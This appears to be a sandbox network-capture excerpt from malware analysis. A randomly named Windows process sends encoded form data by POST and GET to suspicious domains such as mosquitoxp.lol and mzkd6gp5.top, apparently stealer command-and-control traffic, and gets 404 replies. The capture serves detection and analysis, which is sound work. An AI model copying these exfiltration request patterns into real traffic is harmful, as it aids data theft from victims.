                                                        Dec 11, 2024 04:51:06.514564991 CET1236INHTTP/1.1 200 OK
                                                        Server: wts/1.7.0
                                                        Date: Wed, 11 Dec 2024 03:51:56 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "65517fce-1a10"
                                                        Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 31 33 33 33 33 2e 78 79 7a 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 31 33 33 33 33 2e 78 79 7a 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                        Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>313333.xyz-(www.west.cn)</title> <meta name="description" content="313333.xyz," /> <meta name="keywords" content="313333.xyz," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                                        Dec 11, 2024 04:51:06.514604092 CET1236INData Raw: 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 68 31
                                                        Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd, ul,
                                                        Dec 11, 2024 04:51:06.514728069 CET1236INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c
                                                        Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
                                                        Dec 11, 2024 04:51:06.514740944 CET1236INData Raw: 69 7a 65 3a 20 32 34 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32
                                                        Data Ascii: ize: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color:
                                                        Dec 11, 2024 04:51:06.514853001 CET1236INData Raw: 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d
                                                        Data Ascii: .footer-link span { padding: 0 6px; } </style></head><body> <div class="banner-out"> <div class="banner1"> <div class="wrap"> <h1>313333.xyz</h1>
                                                        Dec 11, 2024 04:51:06.514864922 CET708INData Raw: 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e c6 f3 d2 b5 d3 ca cf e4 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                        Data Ascii: " target="_blank"></a> </div> </div> </div> <script> $(function() { $('#J_footerLink a').click(function() { var href = $(this).attr('href'); wind


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.44981938.180.232.109805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:12.500242949 CET809OUTPOST /wdm1/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mosquitoxp.lol
                                                        Origin: http://www.mosquitoxp.lol
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.mosquitoxp.lol/wdm1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4d 61 4f 6b 71 51 2b 6a 44 2f 76 79 6e 46 5a 31 57 78 6f 2f 79 74 33 78 51 6a 37 71 65 54 34 5a 53 44 46 30 39 37 37 51 36 36 6c 32 66 70 66 31 31 45 6c 62 68 6a 75 2b 6b 45 62 77 64 63 76 39 64 74 43 74 35 7a 2b 6f 2b 6f 52 33 45 35 66 69 78 4d 72 79 41 75 44 33 31 33 50 6b 2f 4b 4a 39 62 2b 65 77 74 63 56 32 54 4a 47 4f 6d 39 4d 30 34 66 56 34 38 30 2f 70 35 4f 48 47 58 69 61 6b 36 33 67 54 41 37 76 56 78 70 52 67 41 56 6f 39 79 51 46 38 6d 65 42 64 53 31 30 4d 33 2b 2b 30 79 6d 68 56 52 35 77 42 32 38 2b 68 2b 78 49 4e 2b 63 6e 30 2f 41 3d 3d
                                                        Data Ascii: gnlxDxt=znrBTELJi/+aMaOkqQ+jD/vynFZ1Wxo/yt3xQj7qeT4ZSDF0977Q66l2fpf11Elbhju+kEbwdcv9dtCt5z+o+oR3E5fixMryAuD313Pk/KJ9b+ewtcV2TJGOm9M04fV480/p5OHGXiak63gTA7vVxpRgAVo9yQF8meBdS10M3++0ymhVR5wB28+h+xIN+cn0/A==
                                                        Dec 11, 2024 04:51:13.696995974 CET413INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:50:52 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        Content-Length: 203
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.44982538.180.232.109805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:15.166853905 CET829OUTPOST /wdm1/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mosquitoxp.lol
                                                        Origin: http://www.mosquitoxp.lol
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.mosquitoxp.lol/wdm1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4f 36 2b 6b 73 78 2b 6a 45 66 76 78 69 46 5a 31 66 52 6f 37 79 71 2f 78 51 69 2f 36 65 68 4d 5a 53 6d 68 30 6e 35 66 51 7a 71 6c 32 55 4a 66 77 37 6b 6b 5a 68 6a 71 4d 6b 41 62 77 64 66 54 39 64 6f 2b 74 36 43 2b 72 34 34 52 35 66 4a 66 73 38 73 72 79 41 75 44 33 31 33 4b 7a 2f 4b 68 39 62 4f 4f 77 38 4a 35 31 61 70 47 4e 68 39 4d 30 75 66 56 6b 38 30 2f 78 35 50 61 72 58 68 75 6b 36 32 51 54 42 76 44 57 2f 5a 52 69 4e 31 70 71 69 6c 6f 6d 6d 73 45 73 63 6a 31 73 35 75 71 62 7a 67 73 50 41 49 52 57 6b 38 61 53 6a 32 42 35 7a 66 61 39 6b 41 47 43 45 67 52 36 52 33 4f 57 4e 6c 56 36 71 2f 45 42 4d 43 49 3d
                                                        Data Ascii: gnlxDxt=znrBTELJi/+aO6+ksx+jEfvxiFZ1fRo7yq/xQi/6ehMZSmh0n5fQzql2UJfw7kkZhjqMkAbwdfT9do+t6C+r44R5fJfs8sryAuD313Kz/Kh9bOOw8J51apGNh9M0ufVk80/x5ParXhuk62QTBvDW/ZRiN1pqilommsEscj1s5uqbzgsPAIRWk8aSj2B5zfa9kAGCEgR6R3OWNlV6q/EBMCI=
                                                        Dec 11, 2024 04:51:16.397347927 CET413INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:50:55 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        Content-Length: 203
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.44983138.180.232.109805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:17.832076073 CET10911OUTPOST /wdm1/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mosquitoxp.lol
                                                        Origin: http://www.mosquitoxp.lol
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.mosquitoxp.lol/wdm1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 7a 6e 72 42 54 45 4c 4a 69 2f 2b 61 4f 36 2b 6b 73 78 2b 6a 45 66 76 78 69 46 5a 31 66 52 6f 37 79 71 2f 78 51 69 2f 36 65 68 30 5a 53 30 70 30 6b 5a 6a 51 68 36 6c 32 50 70 66 78 37 6b 6b 59 68 6e 2b 49 6b 42 6e 67 64 5a 66 39 63 4b 6d 74 79 51 47 72 32 34 52 35 58 70 66 68 78 4d 72 6e 41 75 54 7a 31 33 61 7a 2f 4b 68 39 62 4d 47 77 73 73 56 31 57 4a 47 4f 6d 39 4d 47 34 66 56 59 38 30 48 68 35 50 76 57 58 53 32 6b 36 57 41 54 48 61 76 57 39 35 52 6b 4b 31 70 69 69 6c 74 34 6d 73 5a 54 63 6a 6f 37 35 73 32 62 78 68 31 35 55 70 39 64 78 76 79 77 77 30 6c 71 39 64 57 7a 39 78 57 4e 4d 44 64 6b 46 7a 4b 68 43 32 38 46 37 4e 63 71 5a 47 33 75 6e 42 67 72 65 30 4c 6f 61 45 2f 68 61 59 61 41 6c 30 73 65 46 6e 6c 6b 4e 6d 54 50 64 61 2f 67 71 61 6a 47 67 30 6e 54 47 79 38 74 72 31 6d 46 6e 31 6a 4e 63 4f 56 61 6a 48 63 42 52 6d 55 35 59 6e 39 47 54 58 73 36 6f 4f 4f 44 6d 65 37 34 53 7a 61 78 4d 34 2f 7a 63 32 4b 4f 6f 6d 62 67 4e 51 78 48 52 38 53 67 50 6d 72 42 55 57 54 43 6f 30 [TRUNCATED]
                                                        Data Ascii: gnlxDxt=znrBTELJi/+aO6+ksx+jEfvxiFZ1fRo7yq/xQi/6eh0ZS0p0kZjQh6l2Ppfx7kkYhn+IkBngdZf9cKmtyQGr24R5XpfhxMrnAuTz13az/Kh9bMGwssV1WJGOm9MG4fVY80Hh5PvWXS2k6WATHavW95RkK1piilt4msZTcjo75s2bxh15Up9dxvyww0lq9dWz9xWNMDdkFzKhC28F7NcqZG3unBgre0LoaE/haYaAl0seFnlkNmTPda/gqajGg0nTGy8tr1mFn1jNcOVajHcBRmU5Yn9GTXs6oOODme74SzaxM4/zc2KOombgNQxHR8SgPmrBUWTCo0OmNyna/1Q/0G6v/HTv8VYNdBTVrEzWlJSdCFi2SfxAZBpmALswZrf44CSEKFv8rtaBcY5dkPqGMNIZ8viyX5E1lIXnUDt9QUXLTltty4y1KCMUj4W8txwyJWVtXwfgivT3fZYLgtphDkcVvauo4aMM4aeA5n4tMGREsEQQddLs/V3zYwyj6Ns5U6Px/fat/4ddrSekkoAPjbEvbWX3RMFmzWmkoXMjcROYyK4/QHlV5ylNbjaI3sMczZLByNYNMZsFMGjt6MWt0nd4Htjum7tBRcxGle3YPwc8H1R6xl9jFwZPWp0NDC24AzOuvkeu4V7dUuITN/M4wSO2pyBOuGbZQvDiAFIcVF7FuOEIRwDtG/ROzN1MNG4fZB+4oy26FM78Lw0tuufkD2GKjtb4cjDQnWosjXwsI5EAqU+fxaVOk21Y+LNFr31xIPrenArHLrHL97UnmtFUtNZbMOPaemjiHCV4OolHmK87ltstDE1QAEsr6H5CPuRlfy0mEy9X19fCjfpTNRSG+rcfhjyXd30zq+22VYHpSxgZr6DIOGcM8xZdtL//NPhNiskX53NKYIE5L0fIPXsANPBm1DdCA3Zo1FK6rj9wEFRDjby2SnE+VtDzNKDeKYmT+3c8AQ3/SLYm3soqfmr6C8XuI8D6q4uainV+GgpC79uC [TRUNCATED]
                                                        Dec 11, 2024 04:51:19.144105911 CET413INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:50:58 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        Content-Length: 203
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.44984238.180.232.109805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:20.552975893 CET540OUTGET /wdm1/?Cpbp2=zjh46zEHi&gnlxDxt=+lDhQwjcqciYGoyMlAmqcMzIngJLQFU8yJeyXm7/HR5vK2UrnZr15LQFOKrK4FY+rjusngfyUMfjWLDl7Hie+r5rQKPTgM+Sd/Dx7kDur+5/ev3d9JlPdbQ= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mosquitoxp.lol
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:51:21.718976974 CET413INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:01 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        Content-Length: 203
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449858172.67.158.81805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:27.196443081 CET803OUTPOST /0hqe/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mzkd6gp5.top
                                                        Origin: http://www.mzkd6gp5.top
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.mzkd6gp5.top/0hqe/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 77 49 53 4d 44 39 64 61 65 77 52 30 39 7a 4a 75 70 31 78 50 55 6c 70 72 77 36 57 31 70 72 74 58 6e 59 54 50 72 4c 33 52 67 31 69 51 38 38 66 73 30 31 67 64 73 30 76 44 4b 6f 6f 64 59 6d 6a 4e 4e 44 50 36 67 45 61 52 71 51 64 65 62 43 74 39 30 69 48 6a 56 59 42 69 6a 6d 61 44 63 6f 6d 4a 71 61 6c 31 63 64 56 58 43 77 65 54 70 63 72 46 34 73 4b 4c 63 78 69 52 77 74 59 6d 30 4d 55 6d 34 30 48 51 79 62 68 6e 7a 72 38 38 78 2b 6b 2b 50 58 42 75 73 46 64 47 77 34 33 59 35 58 53 69 6d 57 61 47 52 30 47 31 30 32 79 59 78 6d 2f 68 44 51 65 6e 71 51 3d 3d
                                                        Data Ascii: gnlxDxt=OIoVhjzUgo83wISMD9daewR09zJup1xPUlprw6W1prtXnYTPrL3Rg1iQ88fs01gds0vDKoodYmjNNDP6gEaRqQdebCt90iHjVYBijmaDcomJqal1cdVXCweTpcrF4sKLcxiRwtYm0MUm40HQybhnzr88x+k+PXBusFdGw43Y5XSimWaGR0G102yYxm/hDQenqQ==
                                                        Dec 11, 2024 04:51:28.731141090 CET972INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:28 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btpgPfwJtTDsT4%2Fm0CJzRCd7R9DMZMlMycl%2FpT%2BnPexrCz5GQ3fLUEMzhKd%2Fz%2FzWmBS%2FojWv7pO5AsliUky74uR9Oo00sB2y7g3CIGl97KKXOdM7TB%2BLaEoI2ZBslzJ6107B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f028430bdb9728c-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                        Dec 11, 2024 04:51:28.731714964 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449864172.67.158.81805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:29.856681108 CET823OUTPOST /0hqe/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mzkd6gp5.top
                                                        Origin: http://www.mzkd6gp5.top
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.mzkd6gp5.top/0hqe/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 4a 58 6e 34 44 50 6c 71 33 52 6a 31 69 51 30 63 66 70 77 31 67 57 73 30 6a 68 4b 6f 6b 64 59 6e 48 4e 4e 42 6e 36 6a 30 6d 53 71 41 64 51 58 69 74 2f 35 43 48 6a 56 59 42 69 6a 6d 4f 6c 63 6f 2b 4a 71 70 39 31 64 38 56 55 4d 51 65 55 75 63 72 46 38 73 4b 58 63 78 69 7a 77 73 45 66 30 4f 73 6d 34 30 58 51 38 76 56 6d 6b 37 38 6d 38 65 6c 37 41 58 6f 4a 75 31 42 49 7a 65 6a 58 35 33 47 44 71 77 58 63 41 46 6e 69 6d 32 57 72 73 68 32 56 4f 54 6a 75 78 54 65 6f 6e 76 30 4e 44 43 47 61 39 4d 48 73 4c 4d 50 52 37 2b 45 3d
